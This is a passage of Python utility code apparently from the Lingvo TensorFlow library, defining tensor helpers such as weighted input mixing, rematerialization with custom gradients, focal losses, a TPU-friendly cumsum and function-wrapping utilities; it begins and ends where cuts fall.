  [[1, 1, 2, 2, 3, 3], [4, 4, 5, 5, 6, 6]], whereas
  tf.tile(x, multiples=[1, 2]) would give
  [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]].
  """
  if multiple == 1:
    return tensor
  shape = tf.shape(tensor)
  out_dims = tf.concat(
      [shape[:axis], [shape[axis] * multiple], shape[axis + 1:]], 0)
  tile_multiples = tf.concat([
      tf.fill([axis + 1], 1), [multiple],
      tf.fill([tf.rank(tensor) - axis - 1], 1)
  ], 0)
  # Insert a new axis after `axis`, tile along it, then fold it back in.
  expanded = tf.expand_dims(tensor, axis + 1)
  return tf.reshape(tf.tile(expanded, tile_multiples), out_dims)
def StackTensorsRecursively(values):
  """Recursively stacks Tensors in a list of `.NestedMap`.

  Args:
    values: a list of `.NestedMap` or Tensors to stack.

  Returns:
    A `.NestedMap` with stacked values or a stacked Tensor.
  """
  flattened = [v.Flatten() for v in values]
  # zip(*flattened) yields, for each flattened position, the tuple of that
  # position's tensors across all list elements.
  stacked = [tf.stack(list(field)) for field in zip(*flattened)]
  return values[0].Pack(stacked)
def MixByWeight(inputs, weights, seed=None):
  """Returns a weighted random choice and bprop type from the given inputs.

  Args:
    inputs: a list of callables, where each callable returns a tf.Tensor or a
      nested structure containing tf.Tensor. Function return types must be
      consistent across elements. The tf.Operation to compute the result tensor
      will only be invoked for one input at a time. For example, if each fn
      represents an input record stream, a record will be drawn only from a
      selected stream while the other streams will remain unchanged.
    weights: a 1D tensor of float > 0 of the same length as inputs.
    seed: random seed.

  Returns:
    A probabilistic sample from the inputs proportional to the weights. The
    return type will be the same as return type of individual 'fn' from the
    inputs.
    A one-hot vector of the source selected.
  """
  weights = tf.convert_to_tensor(weights, dtype=tf.float32)
  # Runtime sanity checks: one weight per input and no negative weights.
  weights = with_dependencies([
      assert_equal(tf.shape(weights), [len(inputs)]),
      assert_greater_equal(tf.reduce_min(weights), 0.0)
  ], weights)
  # [lower[i], upper[i]) partitions [0, sum(weights)) into one half-open
  # interval per input, with width proportional to weights[i].
  lower = tf.cumsum(weights, exclusive=True)
  upper = tf.cumsum(weights, exclusive=False)
  # A single uniform draw in [0, sum(weights)) selects the interval.
  r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
  # tf.case with exclusive=True: only the selected input's callable runs.
  return_input = tf.case(
      [(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
       for i in range(len(inputs))],
      exclusive=True)
  # `lambda i=i` binds the loop variable at definition time (avoids the
  # late-binding closure pitfall).
  selected_index = tf.case(
      [(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
       for i in range(len(inputs))],
      exclusive=True)
  bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
  return return_input, bprop_index
def CheckShapes(shapes):
  """Asserts that `shapes` is a tuple of NestedMap or tshape.Shape."""
  assert isinstance(shapes, tuple), str(shapes)
  for s in shapes:
    if isinstance(s, NestedMap):
      # Every leaf of the NestedMap must be a symbolic shape.
      assert all(
          isinstance(t, tshape.Shape) for t in Flatten(s)
      ), '{} contains non-tensor value.'.format(s)
    else:
      assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
  """Returns the dtype to use for FProp: `fprop_dtype` if set, else `dtype`."""
  if params.fprop_dtype is not None:
    return params.fprop_dtype
  return params.dtype
def UpdateFpropDtype(params, fprop_dtype):
  """Recursively updates the fprop_dtype of the Params."""
  # Non-Params values can reach here, e.g. when recursing over the items of a
  # SequentialLayer's "sub" list; they are silently skipped.
  if not isinstance(params, hyperparams.Params):
    return
  for name, value in params.IterParams():
    if isinstance(value, hyperparams.Params):
      # Recurse into nested Params.
      UpdateFpropDtype(value, fprop_dtype)
    elif isinstance(value, (list, tuple)):
      # Recurse into each element of list/tuple-valued params.
      for element in value:
        UpdateFpropDtype(element, fprop_dtype)
    elif name == 'fprop_dtype':
      params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
  """Recursively updates the dtype of the Params."""
  # Non-Params values can reach here, e.g. when recursing over the items of a
  # SequentialLayer's "sub" list; they are silently skipped.
  if not isinstance(params, hyperparams.Params):
    return
  for name, value in params.IterParams():
    if isinstance(value, hyperparams.Params):
      # Recurse into nested Params.
      UpdateDtype(value, dtype)
    elif isinstance(value, (list, tuple)):
      # Recurse into each element of list/tuple-valued params.
      for element in value:
        UpdateDtype(element, dtype)
    elif name == 'dtype':
      params.dtype = dtype
def NameScopeDecorator(name_scope):
  """Decorates a python function to introduce a tf.name_scope.

  Example::

    @py_utils.NameScopeDecorator('foobar')
    def MyFoobarMethod(self):
      # ... Do TF things

  Args:
    name_scope: The name scope to introduce.

  Returns:
    A function decorator.
  """
  import functools  # Local import: keeps the fix self-contained.

  def Decorator(f):

    # functools.wraps preserves the wrapped function's __name__/__doc__ so
    # decorated methods stay introspectable (stack traces, docs, pickling).
    @functools.wraps(f)
    def Wrapped(*args, **kwargs):
      with tf.name_scope(name_scope):
        return f(*args, **kwargs)

    return Wrapped

  return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
  """Returns debug strings for the given sequences.

  Args:
    ids: int32 of [batch, len].
    lens: int32 of [batch].
    summarize: number of ids to summarize per sequence.

  Returns:
    A string tensor of [batch].
  """
  num_seqs = tf.shape(lens)[0]

  def _Body(i, result):
    # Format the i-th sequence truncated to its actual length lens[i], and
    # append it to the accumulated result.
    line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
    return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)

  i0 = tf.zeros(shape=[], dtype=tf.int32)
  result0 = tf.constant('', shape=[0], dtype=tf.string)
  # The accumulator grows by one string per iteration, hence the [None]
  # shape invariant.
  _, strs = tf.while_loop(
      lambda i, result: i < num_seqs,
      _Body, (i0, result0),
      shape_invariants=(i0.shape, tf.TensorShape([None])))
  return strs
# TODO(jamesqin): follow suggestions in
# b/167460492#comment16
def RematerializeFn(fn, *xs):
  """Calls fn and rematerializes fn in the backward pass.

  `fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.

  Args:
    fn: A python function to be rematerialized in the backprop pass.
    *xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
      fn function.

  Returns:
    `fn(*xs)`
  """
  # Capture the step seed before and after fn so the backward replay can
  # reproduce the exact same in-graph randomness.
  initial_step_seed = GetStepSeed()
  final_step_seed = MaybeGenerateSeedFromScope()

  def Backward(fwd_xs, fwd_ys, d_fwd_ys):
    """The backward function that rematerializes forward outputs."""
    del fwd_ys
    # always_true is tautologically True; the tf.where below is an identity
    # that forces the inputs through a fresh op for the replay.
    always_true = tf.random.uniform([]) < 2.0
    # Alternatively, can do this:
    # tf.where(tf.math.is_nan(x),
    #          tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
    #          x)
    bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in fwd_xs.xs]
    # Restore static shape info lost across the function boundary.
    for dst, src in zip(bak_xs, xs):
      dst.set_shape(src.shape)
    # Replay the forward computation under the original step seed.
    ResetStepSeed(initial_step_seed)
    ys = fn(*bak_xs)
    MaybeResetStepSeed(final_step_seed)
    dxs = tf.gradients(ys, bak_xs, grad_ys=d_fwd_ys)
    dxs_final = []
    # tf.gradients yields None for unconnected inputs; substitute zeros so the
    # returned structure matches bak_xs one-to-one.
    for dx, x in zip(dxs, bak_xs):
      if dx is None:
        dxs_final.append(tf.zeros_like(x))
      else:
        dxs_final.append(dx)
    assert len(dxs_final) == len(bak_xs)
    return NestedMap(
        initial_step_seed=tf.zeros_like(initial_step_seed), xs=dxs_final)

  ys_shapes = []

  # TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
  def Forward(fwd_xs):
    """Forward function plus sanity checks."""
    for dst, src in zip(fwd_xs.xs, xs):
      dst.set_shape(src.shape)
    ResetStepSeed(fwd_xs.initial_step_seed)
    ys = fn(*fwd_xs.xs)
    # Some sanity check.
    assert not GetExtraInputs()
    assert not GetExtraArgs()
    assert not GetExtraVars()
    # Record output shapes so they can be re-applied outside the Defun.
    if isinstance(ys, tuple):
      for y in ys:
        assert isinstance(y, tf.Tensor)
        ys_shapes.append(y.shape)
    else:
      assert isinstance(ys, tf.Tensor)
      ys_shapes.append(ys.shape)
    return ys

  ys = CallDefun(
      Forward,
      NestedMap(initial_step_seed=initial_step_seed, xs=xs),
      bak=Backward)
  # Restore static shapes that may be lost across the CallDefun boundary.
  if isinstance(ys, tuple):
    for y, s in zip(ys, ys_shapes):
      y.set_shape(s)
  else:
    ys.set_shape(ys_shapes[0])
  # TODO(b/129159299): The ResetStepSeed below is needed to work around this
  # bug, which is a problem with global tensors being shared by different
  # inference graphs. It should be replaced with the new step seed value
  # returned from the Forward function when the bug is fixed.
  MaybeResetStepSeed(final_step_seed)
  return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
# Used by StatefulRandomOpsInDefun below to detect ops that would produce
# inconsistent values between FProp and BProp.
_STATEFUL_RANDOM_OPS = frozenset({
    # pyformat: disable
    'RandomUniform',
    'RandomUniformInt',
    'RandomStandardNormal',
    'ParameterizedTruncatedNormal',
    'TruncatedNormal',
    'RandomShuffle',
    'Multinomial',
    'RandomGamma',
    'RandomPoisson',
    'RandomPoissonV2',
    # pyformat: enable
})
def StatefulRandomOpsInDefun(func, graph=None):
  """Checks whether the Defun depends on stateful random number ops.

  Stateful random number generator ops should be avoided in Recurrent() call.
  Otherwise, these ops produce inconsistent values between FProp and BProp.

  Args:
    func: a _DefinedFunction or ConcreteFunction to check.
    graph: a Graph. Set None to use the default graph.

  Returns:
    A list of names of the stateful random ops.

  Raises:
    InvalidArgumentError: if the input func/graph is invalid.
  """
  if graph is None:
    graph = tf.get_default_graph()
  func.add_to_graph(graph)
  graph_def = graph.as_graph_def()
  # A dict from function name to FunctionDef.
  func_defs = {x.signature.name: x for x in graph_def.library.function}
  # Seed the worklist with the function's own nodes; sub-function nodes are
  # added lazily as call sites are discovered.
  if isinstance(func, function._DefinedFunction):  # pylint: disable=protected-access
    if func.definition.signature.name not in func_defs:
      raise tf.errors.InvalidArgumentError(
          None, None, 'Defun {} is not in the graph .'.format(
              func.definition.signature.name))
    nodes = py_collections.deque(func.definition.node_def)
  else:
    nodes = py_collections.deque(func.function_def.node_def)
  stateful_ops = []
  # Recursively search for stateful random op (worklist/DFS over node defs).
  while nodes:
    node = nodes.pop()
    assert isinstance(node, node_def_pb2.NodeDef), node
    if node.op in _STATEFUL_RANDOM_OPS:
      stateful_ops.append(node.name)
      continue

    def _AddDefunNodes(func_name):
      """If the given func_name is a Defun, add its sub-nodes into nodes."""
      if func_name in func_defs:
        nodes.extend(func_defs[func_name].node_def)

    # For functional.{While|For|If} ops, add their Defun attr into search.
    if node.op == 'While':
      _AddDefunNodes(node.attr['body'].func.name)
      _AddDefunNodes(node.attr['cond'].func.name)
    elif node.op == 'For':
      _AddDefunNodes(node.attr['body'].func.name)
    elif node.op == 'If':
      _AddDefunNodes(node.attr['then_branch'].func.name)
      _AddDefunNodes(node.attr['else_branch'].func.name)
    elif node.op == 'StatefulPartitionedCall':
      _AddDefunNodes(node.attr['f'].func.name)
    elif node.op != 'PartitionedCall':
      # For other op, check whether itself is a Defun op.
      _AddDefunNodes(node.op)
  return stateful_ops
def ToPlaceholders(nmap, dtype=None):
  """Converts every Tensor in nmap to a placeholder."""

  def _ToPlaceholder(t):
    # Keep only the innermost dimension static; all leading dims are dynamic.
    shape = [None] * (len(t.shape) - 1) + [t.shape[-1]]
    return tf.placeholder(dtype=dtype or t.dtype, shape=shape)

  return nmap.Transform(_ToPlaceholder)
def Softmax(logits, axis=None, extra_logit=None, name=None):
  """Softmax with an optional extra logit, might be useful for large xformer LM."""
  if extra_logit is None:
    # No extra logit: plain softmax.
    return tf.nn.softmax(logits, axis=axis, name=name)
  if axis is None:
    axis = -1

  def _ReduceLogSumExpWithExtra(x):
    # Numerically stable logsumexp that folds in `extra_logit` as one more
    # (broadcast) element of the reduction.
    max_logit = tf.math.reduce_max(
        tf.stop_gradient(x), axis=axis, keepdims=True)
    base_logit = tf.math.maximum(max_logit, extra_logit)
    shifted = x - base_logit
    exp_shifted = tf.math.exp(shifted)
    sum_exp = tf.math.reduce_sum(exp_shifted, axis=axis, keepdims=True)
    sum_exp += tf.math.exp(extra_logit - base_logit)
    return tf.math.log(sum_exp) + base_logit

  with tf.name_scope(name):
    # softmax = exp(log_softmax) = exp(x - logsumexp(x)).
    return tf.math.exp(logits - _ReduceLogSumExpWithExtra(logits))
def SoftmaxCrossEntropyFocalLoss(logits,
                                 label_ids=None,
                                 label_probs=None,
                                 alpha=None,
                                 gamma=None,
                                 stop_gradient_on_focal_loss_coefficient=False):
  u"""Focal loss for multinomial (softmax) logistic loss.

  [1] Focal loss https://arxiv.org/abs/1708.02002

  Args:
    logits: [..., C]. Logits for the multinomial logistic regression. C is the
      number of classes.
    label_ids: [...]. Each entry in labels must be an index in [0, C).
    label_probs: [..., C]. Each vector along last dimension must be a valid
      probability distribution.
    alpha: [C]. The weighting factor alpha. Eq (3) in [1].
    gamma: []. Tunable focusing parameter. Eq (4) in [1].
    stop_gradient_on_focal_loss_coefficient: If true, stops gradient on the
      focal loss coefficient (1-p)^gamma to stabilize the gradient.

  Returns:
    loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
  """

  def _ApplyFocalLossCoefficient(loss, log_probs):
    # Scales loss by (1 - p)^gamma (Eq (4) in [1]); no-op when gamma is unset
    # or zero.
    if gamma is not None and gamma != 0:
      probs = tf.exp(log_probs)
      coefficient = tf.pow(1.0 - probs, gamma)
      if stop_gradient_on_focal_loss_coefficient:
        coefficient = tf.stop_gradient(coefficient)
      loss *= coefficient
    return loss

  if label_probs is not None:
    # Dense (soft) labels: full cross entropy against label_probs.
    log_probs = tf.nn.log_softmax(logits)
    loss = -(label_probs * log_probs)
    loss = _ApplyFocalLossCoefficient(loss, log_probs)
    if alpha is not None:
      # Reshape alpha [C] to rank(loss) with leading 1s so it broadcasts over
      # all leading dimensions.
      loss *= tf.reshape(
          alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
                           axis=0))
    loss = tf.reduce_sum(loss, axis=-1)
  else:
    # Sparse integer labels. The cross entropy equals -log(p) of the target
    # class, so -loss is the target class's log-probability.
    loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels=label_ids, logits=logits)
    loss = _ApplyFocalLossCoefficient(loss, -loss)
    if alpha is not None:
      loss *= tf.gather(alpha, label_ids)
  return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
  u"""Focal loss for binary (sigmoid) logistic loss.

  [1] Focal loss https://arxiv.org/abs/1708.02002

  Args:
    logits: [..., C]. Logits for the sigmoid logistic regression.
    labels: [..., C]. 0/1 labels.
    alpha: The weighting factor alpha. Eq (3) in [1].
    gamma: Tunable focusing parameter. Eq (4) in [1].

  Returns:
    loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
  """
  # Numerically stable -log(pₜ): log(p) for positives, log(1-p) for negatives.
  loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
  if gamma is not None and gamma != 0:
    # Modulating factor, [1] Eq (4):
    #   (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ for positives,
    #   pˠ = [σ(x)]ˠ for negatives;
    # both collapse to σ(x·(1-2y))ˠ for y ∈ {0, 1}.
    modulator = tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
    loss = loss * modulator
  if alpha is not None:
    # Class-balancing weight αₜ, [1] Eq (3).
    balancer = alpha * labels + (1 - alpha) * (1 - labels)
    loss = loss * balancer
  return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z]+):(.*)')


def RecordFormatFromFilePattern(file_pattern):
  """Splits a Lingvo file pattern into its record format and bare pattern.

  Lingvo file patterns take the form of:
    tfrecord:/path/to/bar -> tfrecord is the record_format.

  This function takes a file pattern and returns a string indicating
  which format the filepattern implies.

  Args:
    file_pattern: String file pattern.

  Returns:
    Tuple (string, string):

      - record_format: String record format, e.g., "tfrecord", etc.
      - file_pattern: The file pattern without any prefixes.
  """
  match = _RECORD_FORMAT_RE.match(file_pattern)
  if match:
    # The regexp guarantees exactly two groups: the record format and then
    # the remainder of the pattern.
    return match.groups()
  # TODO(vrv): Fix all callers so that file_pattern must contain
  # the record format prefix.
  return 'sstable', file_pattern
def ReadFileLines(file_path):
  """Reads a text file and returns its lines.

  If the file cannot be found at the given path, attempts to load it from the
  Lingvo package (useful for data dependencies in par files).

  Args:
    file_path: path to file, either absolute or relative to the bazel workspace.

  Returns:
    A list of lines from the file.
  """
  lines = None
  if not tf.io.gfile.exists(file_path):
    # Fall back to package data, e.g. when running from a par file.
    try:
      data = pkgutil.get_data('lingvo', file_path.replace('lingvo/', '', 1))
      lines = data.splitlines(True)
    except IOError:
      # If pkgutil can't find the file, continue and let GFile raise the error.
      lines = None
  if not lines:
    with tf.io.gfile.GFile(file_path, 'r') as f:
      lines = f.readlines()
  return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False, use_einsum=False):
  """A TPU efficient implementation of tf.cumsum().

  This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
  the axis dimension is very large. The current Tensorflow implementation is
  based on scanning and reducing which is not efficient on TPU.

  Args:
    x: An input Tensor.
    axis: An int for the axis.
    exclusive: A bool for performing exclusive cumsum.
    use_einsum: If true, use einsum on TPU.

  Returns:
    A Tensor of the same shape as x.

  Raises:
    ValueError: if the input axis is invalid.
  """
  if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
    # Fallback to tf.cumsum when inputs are not floats or not running on TPU.
    return tf.cumsum(x, axis=axis, exclusive=exclusive)
  rank = GetRank(x)
  # Needs to know the rank for the final transpose if axis is not the last
  # dimension. Otherwise, falls back to tf.cumsum.
  if not isinstance(rank, int) and axis != -1:
    return tf.cumsum(x, axis=axis, exclusive=exclusive)
  if axis < -1:
    # Normalize a negative axis (other than -1) to its positive equivalent.
    if axis + rank < 0:
      raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
    axis += rank
  if use_einsum:
    assert isinstance(rank, int) and rank < 26, rank
    # Use einsum to avoid data formatting overhead.
    a2z = ''.join([chr(i) for i in range(97, 123)])  # abc...xyz
    src = a2z[:rank]
    if axis == -1:
      tgt = src[:-1] + 'z'
    else:
      tgt = src[:axis] + 'z' + src[axis + 1:]
    length = GetShape(x)[axis]
    # Upper-triangular ones matrix: contracting x against it sums each prefix
    # along `axis`. Note: inclusive cumsum only; `exclusive` is not applied on
    # this path — callers appear to rely on the default exclusive=False here.
    causal_mask = tf.linalg.band_part(
        tf.ones([length, length], dtype=x.dtype), 0, -1)
    return tf.einsum(f'{src},{src[axis]}z->{tgt}', x, causal_mask)
  length = GetShape(x)[axis]
  my_range = tf.range(length)
  # mask[i, j] = 1 iff input position i contributes to output position j
  # (strictly-before when exclusive).
  comparator = tf.less if exclusive else tf.less_equal
  mask = tf.cast(
      comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
      x.dtype)
  # Contract along `axis` against the mask; tensordot moves the contracted
  # output dimension to the end.
  result = tf.tensordot(x, mask, axes=[[axis], [0]])
  if axis != -1 and axis != rank - 1:
    # Move the cumsum'd dimension back to its original position.
    result = tf.transpose(
        result,
        list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
  return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
  """Linear projection on the last dim of the input tensor.

  This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
  tensor by using Einsum for the compute.

  Args:
    inputs: An input Tensor, the last dimension of which is input_dim.
    weight: A weight matrix with shape [input_dim, output_dim].
    input_dim: An integer or a symbolic dim, the last dimension of the inputs.
    output_dim: An integer or a symbolic dim, the last dimension of the outputs.

  Returns:
    An output Tensor of the same rank as inputs, the last dimension is
    output_dim.
  """
  # Resolve symbolic dims to concrete ints before shape checks.
  input_dim = int(
      symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
  output_dim = int(
      symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
                                                      ) else output_dim)
  # Assert input_dim and output_dim
  inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
                             inputs)
  weight = with_dependencies([
      assert_equal(GetShape(weight)[0], input_dim),
      assert_equal(GetShape(weight)[-1], output_dim)
  ], weight)
  if (use_tpu() and inputs.shape is not None and
      inputs.shape.rank is not None and inputs.shape.rank < 26):
    # Avoids reshape if feasible and uses Einsum.
    if inputs.shape.rank == 2:
      outputs = tf.matmul(inputs, weight)
    else:
      # This is equivalent to:
      #   outputs = tf.einsum('...y,yz->...z', inputs, weight)
      # Unfortunately ... in einsum() leads to extra HBM usage.
      # Spell out the leading dims with explicit letters instead (rank < 26
      # guarantees enough letters).
      s = ''.join([chr(x) for x in range(97, 123)])  # abc...xyz
      r = inputs.shape.rank
      outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
  else:
    # Non-TPU (or very high rank) path: flatten to rank 2, matmul, then
    # restore the original leading dims.
    outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
    outputs = tf.reshape(
        outputs,
        tf.concat([
            tf.cast(GetShape(inputs)[:-1], tf.int32),
            ToStaticShape([output_dim])
        ],
                  axis=0))
  return outputs
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
  """Hacks to replace certain unwanted tensorflow ops."""
  # TODO(zhifengc/huangyp): Consider implementing assert_equal
  # op replacement for lingvo. As assert_equal doesn't support String on GPUs.
  # TODO(b/136040013): Remove this after migration to tf.function.
  if not remove:
    yield
    return
  # Hack to replace tf.assert_equal with a no-op for the scope's duration.
  saved_assert_equal = tf.check_ops.assert_equal

  def _NoOp(*args, **kwargs):  # pylint: disable=unused-argument
    return tf.no_op()

  tf.check_ops.assert_equal = _NoOp  # Make assert_equal a no op.
  try:
    yield
  finally:
    # Always restore, even if the body raised.
    tf.check_ops.assert_equal = saved_assert_equal
def _AssertInputsMatch(op, args, implicit_captures):
  """Asserts that op's inputs match with args plus implicit_captures.

  Args:
    op: The operation to check.
    args: A nested structure representing the explicit arguments of 'op'.
    implicit_captures: A nested structure representing the implicitly captured
      inputs of 'op'.

  Raises:
    ValueError: if the number of inputs mismatch.
  """
  expected_inputs = Flatten([args, implicit_captures])
  expected_num_inputs = len(expected_inputs)
  actual_num_inputs = len(op.inputs)
  if actual_num_inputs > expected_num_inputs:
    raise ValueError(('Too many inputs. The most likely cause is that fwd '
                      'captures additional tensors: extra inputs %r vs %r '
                      'captures=%r') % (list(op.inputs), list(expected_inputs),
                                        list(Flatten(implicit_captures))))
  if actual_num_inputs < expected_num_inputs:
    raise ValueError(('Mismatched inputs to fwd: Found %d vs expected %d: %r'
                      '. Implicit captures(%d) = %r') %
                     (actual_num_inputs, expected_num_inputs, list(op.inputs),
                      len(Flatten(implicit_captures)), implicit_captures))
def TensorSpecs(nmap, keep_shape=True):
  """Transforms tensors in the input nested structure to TensorSpecs."""
  if nmap is None:
    return None

  def _ToSpec(t):
    # Drop the shape when keep_shape is False (spec matches any shape).
    return tf.TensorSpec(t.shape if keep_shape else None, t.dtype)

  return Transform(_ToSpec, nmap)
def _DefineDefun(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
  """Wraps fwd in a defun with custom gradient bak.

  Args:
    fwd: A callable xs: Nested Structure -> ys: Nested Structure.
    fwd_sig: A Nested Structure of tf.TensorSpec representing the input
      signature of `fwd`, or None (meaning that fwd takes no inputs).
    bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
      Structure. The custom backprop function for `fwd`. bak needs to return
      dcapture if fwd uses any implicitly captured tensors, whose gradients are
      dcapture.
    bak_as_function: Whether to create a TF graph function for `bak`.
    device: the device on which to run `fwd` and `bak`.

  Returns:
    A NestedMap containing:

    - call: A callable that will execute `fwd`. It has the same input and
      output signatures as `fwd`.
    - func: The underlying TF function that `call` calls. If not None, it will
      be a _DefinedFunction or ConcreteFunction that takes flat inputs and
      returns flat outputs, and can be used by routines that require a TF
      function object (e.g. tf.If, tf.While, etc).
      Always not None when `bak` is None.
    - output_dtypes: A nested structure compatible with the outputs of `fwd`
      containing the corresponding output dtypes.
    - stateful_ops: A list of (op_name, op_type) tuples representing the
      stateful ops used by `fwd`.
    - captured_inputs: Implicit inputs captured by `fwd`.
  """
  assert fwd is not None
  # Outside XLA, keep the function non-inlined so RemoveAssertContext (used
  # below) applies to its body.
  noinline = not use_xla()
  if fwd_sig is None:
    fwd_sig = []
  get_dtype = lambda x: x.dtype
  arg_dtypes = Flatten(Transform(get_dtype, fwd_sig))
  get_shape = lambda x: x.shape
  arg_shapes = Flatten(Transform(get_shape, fwd_sig))
  # Used to hold the backward function used by Grad, which will be defined if
  # bak is set.
  sigs = NestedMap()
  # Output of this method.
  res = NestedMap()
  python_grad_func = None
  if bak:

    def Grad(op, *args):
      """Gradient function for the forward function.

      Args:
        op: The forward operation.
        *args: Gradients wrt op.outputs.

      Returns:
        Tuple of derivatives.
      """
      _AssertInputsMatch(op, fwd_sig, res.captured_inputs)
      # Ensure dys contains no None.
      args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
      xs = op.inputs[:len(arg_dtypes)]  # The rest are captures.
      return sigs.backward(*Flatten([xs, op.outputs, args]))

    python_grad_func = Grad

  def _SetShape(dst_list, shape_list):
    # Restores static shape info, which is lost across the Defun boundary.
    for dst, shape in zip(dst_list, shape_list):
      if isinstance(dst, tf.Tensor):
        dst.set_shape(shape)

  @tf.Defun(*arg_dtypes, python_grad_func=python_grad_func, noinline=noinline)
  def Forward(*args):
    """The forward function."""
    _SetShape(args, arg_shapes)
    with RemoveAssertContext(remove=noinline):
      call = lambda: fwd(Pack(fwd_sig, args)) if args else fwd()
      if device is None:
        # Defun will handle the device assignment.
        rets = call()
      else:
        with tf.device(device):
          rets = call()
    # Stash the structured outputs so Call below can re-pack flat results.
    res.outputs = rets
    return Flatten(rets)

  forward = Forward
  if not arg_dtypes:
    # In this case Forward is an _OverloadedFunction, we need to instantiate
    # it.
    forward = Forward.instantiate([])
  # Invokes fwd() to get res.outputs.
  forward.add_to_graph(tf.get_default_graph())
  res.func = forward
  res.stateful_ops = forward.stateful_ops
  res.captured_inputs = forward.captured_inputs
  output_dtypes = Transform(get_dtype, res.outputs)
  output_shapes = Transform(get_shape, res.outputs)

  def Call(args=None):
    """Wrapper of fwd."""
    if args is None:
      flat_rets = forward()
    else:
      flat_rets = forward(*Flatten(args))
    if not isinstance(flat_rets, (tuple, list)):
      flat_rets = [flat_rets]
    _SetShape(flat_rets, Flatten(output_shapes))
    return Pack(output_dtypes, flat_rets)

  res.call = Call
  if bak:

    def Backward(*args):
      """The backward function."""
      # args is the flat concatenation of [xs, ys, dys].
      _SetShape(args, Flatten([arg_shapes, output_shapes, output_shapes]))
      xs, ys, dys = Pack([fwd_sig, output_dtypes, output_dtypes], args)
      with RemoveAssertContext(remove=noinline):
        if device is None:
          # Defun will handle the device assignment.
          dxs = bak(xs, ys, dys)
        else:
          with tf.device(device):
            dxs = bak(xs, ys, dys)
      return Flatten(dxs)

    if bak_as_function:
      sigs.backward = tf.Defun(
          *Flatten([arg_dtypes, output_dtypes, output_dtypes]),
          noinline=noinline)(
              Backward)
      sigs.backward.add_to_graph(tf.get_default_graph())
    else:
      sigs.backward = Backward
  return res
# Global variable to control rendezvous sharing in tf.function.
# If False (default) rendezvous sharing is disabled in tf.function, that is,
# the function body uses a separate rendezvous and can't communicate with the
# parent graph via send/recv.
# With _GetSharedRendezvous() == True, the function body shares the same
# rendezvous with the parent graph and can talk to it using send/recv. This is
# useful for layers like StackedRecurrent.
_SHARED_RENDEZVOUS = ThreadLocalStack()
@contextlib.contextmanager
def _SharedRendezvousScope(shared_rendezvous=True):
  """Scopes the thread-local rendezvous sharing setting (see above)."""
  stack = _SHARED_RENDEZVOUS.stack
  stack.append(shared_rendezvous)
  try:
    yield
  finally:
    stack.pop()
def _GetSharedRendezvous():
  """Get the current rendezvous sharing setting."""
  stack = _SHARED_RENDEZVOUS.stack
  if stack:
    return stack[-1]
  # Default: no rendezvous sharing.
  return False
def _ApplySharedRendezvous(func):
  """Applies the current rendezvous sharing setting to tf.function `func`."""
  # setattr sidesteps the pylint protected-access warning for this private
  # tf.function attribute.
  setattr(func, '_shared_rendezvous', _GetSharedRendezvous())
def _WrapFunction(func=None, input_signature=None):
  """Wraps func as a tf.function and returns its ConcreteFunction.

  Usable both as `foo = _WrapFunction(foo, sig)` and as `@_WrapFunction(sig)`.

  Args:
    func: the python callable to wrap, or None when used as a decorator
      factory.
    input_signature: a flat list of tf.TensorSpec for the function's inputs;
      None means no inputs.

  Returns:
    The traced ConcreteFunction (or a decorator producing one).
  """
  if input_signature is None:
    input_signature = []

  def Decorated(fn):

    @tf.function(input_signature=input_signature, autograph=False)
    def Fn(*args):
      # TODO(b/163904067): mimic Defun' behavior and reset the step seed to
      # avoid it being used as an implicit capture. This is not a desired
      # behavior, it should take the step seed from parent graph instead.
      ResetStepSeed()
      # Mimic Defun and disable collection sharing.
      graph = tf.get_default_graph()
      # Don't share summaries collection with parent graph (b/168745134).
      graph.clear_collection(tf.GraphKeys.SUMMARIES)
      return fn(*args)

    _ApplySharedRendezvous(Fn)
    # Add the function to the graph so it'll be traced under the current
